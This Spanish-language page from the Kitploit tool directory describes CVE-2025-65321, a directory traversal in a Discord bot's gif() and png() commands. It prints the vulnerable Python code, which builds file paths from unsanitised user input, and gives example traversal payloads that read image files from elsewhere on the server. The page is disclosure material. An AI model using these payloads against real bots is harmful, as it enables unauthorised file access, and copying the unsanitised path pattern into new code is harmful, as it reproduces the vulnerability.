Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-65321 — Language Sloth Sloth Bot 1.0 es vulnerable a Directory Traversal en las funciones gif() y png(). Las funciones construyen rutas de archivo utilizando entrada de usuario sin sanitizar para el parámetro 'name', lo que permite a los atacantes referenciar archivos fuera de los directorios de recursos previstos. | Kitploit
Herramientas/GitHubGitHub/smarttfoxx/cve-2025-65321
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de Información
GitHubsmarttfoxx/cve-2025-65321

CVE-2025-65321

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

2hace 8 mesesAún no revisado

Language Sloth Sloth Bot 1.0 es vulnerable a Directory Traversal en las funciones gif() y png(). Las funciones construyen rutas de archivo utilizando entrada de usuario sin sanitizar para el parámetro 'name', lo que permite a los atacantes referenciar archivos fuera de los directorios de recursos previstos.

Compartir

CVE-2025-65321

El bot de Discord Language Sloth es vulnerable a Directory Traversal en las funciones gif() y png(). Las funciones construyen rutas de archivo utilizando entrada de usuario sin saneamiento para el parámetro 'name', lo que permite a los atacantes hacer referencia a archivos fuera de los directorios de recursos previstos.

Las funciones "gif" y "png" del archivo files.py son vulnerables a directory traversal, ya que usan "open" para recuperar archivos localmente desde el servidor que aloja al bot. Los payloads siguientes permiten a cualquier usuario de Discord recuperar archivos ".gif" y ".png" alojados en cualquier parte del servidor que aloja al bot.

root@kitploit:~
async def gif(self, ctx, name: str = None):
        '''
        (ADM) Sends a gif from the bot's gif folder.
        :param name: The name of the gif file.
        '''
        await ctx.message.delete()
        try:
            with open(f'./gif/{name}.gif', 'rb') as pic:
                await ctx.send(file=discord.File(pic))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")
root@kitploit:~
async def png(self, ctx, name: str = None):
        '''
        (ADM) Sends a png from the bot's png folder.
        :param name: The name of the png file.
        '''
        await ctx.message.delete()
        try:
            await ctx.send(file=discord.File(f'./png/{name}.png'))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")

El parámetro name se interpola directamente en la ruta de archivo sin validación ni saneamiento:

root@kitploit:~
f'./gif/{name}.gif'
f'./png/{name}.png'

Ejemplos de payloads:

root@kitploit:~
z!gif ..\..\..\..\Windows\filename
root@kitploit:~
z!png ..\..\..\..\Windows\filename
imagen

La imagen anterior muestra la extracción de una imagen ubicada en C:\Windows\cat.gif

Descargar herramienta